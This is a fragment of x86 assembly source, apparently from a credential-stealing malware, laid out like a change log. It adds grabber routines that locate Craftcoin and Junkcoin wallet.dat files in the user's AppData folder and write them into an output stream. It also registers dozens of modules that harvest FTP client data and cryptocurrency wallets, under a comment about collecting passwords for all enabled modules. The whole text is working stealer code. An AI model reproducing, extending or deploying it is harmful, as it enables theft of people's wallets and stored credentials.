; Tested: v1.1.1.2-unk-crc
; SFTP: not supported

IFDEF COMPILE_MODULE_CRAFTCOIN

.data
   CCraftcoinWalletFile               db   'wallet.dat',0
   CCraftcoinAppDataDir               db   '\Craftcoin',0

.code

GrabCraftcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_CRAFTCOIN, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CCraftcoinAppDataDir, offset CCraftcoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabCraftcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; JunkCoin
; http://jkcoin.com/
; Tested: v0.6.3.0-unk-beta
; SFTP: not supported

IFDEF COMPILE_MODULE_JUNKCOIN

.data
   CJunkcoinWalletFile               db   'wallet.dat',0
   CJunkcoinAppDataDir               db   '\Junkcoin',0

.code

GrabJunkcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_JUNKCOIN, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CJunkcoinAppDataDir, offset CJunkcoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabJunkcoin endp

ENDIF

Line 13229 (code addition):
               AddModule COMPILE_MODULE_FASTTRACK, GrabFastTrack
               AddModule COMPILE_MODULE_BITCOIN, GrabBitcoin
               AddModule COMPILE_MODULE_ELECTRUM, GrabElectrum
               AddModule COMPILE_MODULE_MULTIBIT, GrabMultiBit
               AddModule COMPILE_MODULE_FTPDISK, GrabFTPDisk
               AddModule COMPILE_MODULE_LITECOIN, GrabLitecoin
               AddModule COMPILE_MODULE_NAMECOIN, GrabNamecoin
               AddModule COMPILE_MODULE_TERRACOIN, GrabTerracoin
               AddModule COMPILE_MODULE_BITCOINARMORY, GrabBitcoinArmory
               AddModule COMPILE_MODULE_PPCOIN, GrabPPCoin
               AddModule COMPILE_MODULE_PRIMECOIN, GrabPrimecoin
               AddModule COMPILE_MODULE_FEATHERCOIN, GrabFeathercoin
               AddModule COMPILE_MODULE_NOVACOIN, GrabNovaCoin
               AddModule COMPILE_MODULE_FREICOIN, GrabFreicoin
               AddModule COMPILE_MODULE_DEVCOIN, GrabDevcoin
               AddModule COMPILE_MODULE_FRANKOCOIN, GrabFrankocoin
               AddModule COMPILE_MODULE_PROTOSHARES, GrabProtoShares
               AddModule COMPILE_MODULE_MEGACOIN, GrabMegacoin
               AddModule COMPILE_MODULE_QUARKCOIN, GrabQuarkcoin
               AddModule COMPILE_MODULE_WORLDCOIN, GrabWorldcoin
               AddModule COMPILE_MODULE_INFINITECOIN, GrabInfinitecoin
               AddModule COMPILE_MODULE_IXCOIN, GrabIxcoin
               AddModule COMPILE_MODULE_ANONCOIN, GrabAnoncoin
               AddModule COMPILE_MODULE_BBQCOIN, GrabBBQcoin
               AddModule COMPILE_MODULE_DIGITALCOIN, GrabDigitalcoin
               AddModule COMPILE_MODULE_MINCOIN, GrabMincoin
               AddModule COMPILE_MODULE_GOLDCOIN, GrabGoldcoin
               AddModule COMPILE_MODULE_YACOIN, GrabYacoin
               AddModule COMPILE_MODULE_ZETACOIN, GrabZetacoin
               AddModule COMPILE_MODULE_FASTCOIN, GrabFastcoin
               AddModule COMPILE_MODULE_I0COIN, GrabI0coin
               AddModule COMPILE_MODULE_TAGCOIN, GrabTagcoin
               AddModule COMPILE_MODULE_BYTECOIN, GrabBytecoin
               AddModule COMPILE_MODULE_FLORINCOIN, GrabFlorincoin
               AddModule COMPILE_MODULE_PHOENIXCOIN, GrabPhoenixcoin
               AddModule COMPILE_MODULE_LUCKYCOIN, GrabLuckycoin
               AddModule COMPILE_MODULE_CRAFTCOIN, GrabCraftcoin
               AddModule COMPILE_MODULE_JUNKCOIN, GrabJunkcoin

Line 13273 (comment added):
; Collect passwords for all enabled modules